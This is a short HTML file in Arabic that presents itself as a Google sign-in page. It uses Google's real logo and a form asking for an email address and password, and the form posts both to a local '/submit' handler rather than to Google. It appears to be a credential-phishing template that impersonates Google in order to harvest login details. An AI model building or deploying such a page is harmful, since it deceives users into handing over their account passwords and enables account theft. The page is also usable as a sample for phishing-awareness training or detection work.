<!DOCTYPE html>
<html lang="ar">
<head>
  <meta charset="UTF-8">
  <title>تسجيل الدخول - Google</title>
  <link rel="stylesheet" href="/static/style.css">
</head>
<body>

  <div class="login-box">
    <img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png" width="150">
    <h2>تسجيل الدخول</h2>

    <form method="POST" action="/submit">
      <input type="email" name="email" placeholder="البريد الإلكتروني" required>
      <input type="password" name="password" placeholder="كلمة المرور" required>
      <button type="submit">دخول</button>
    </form>
  </div>

</body>
</html>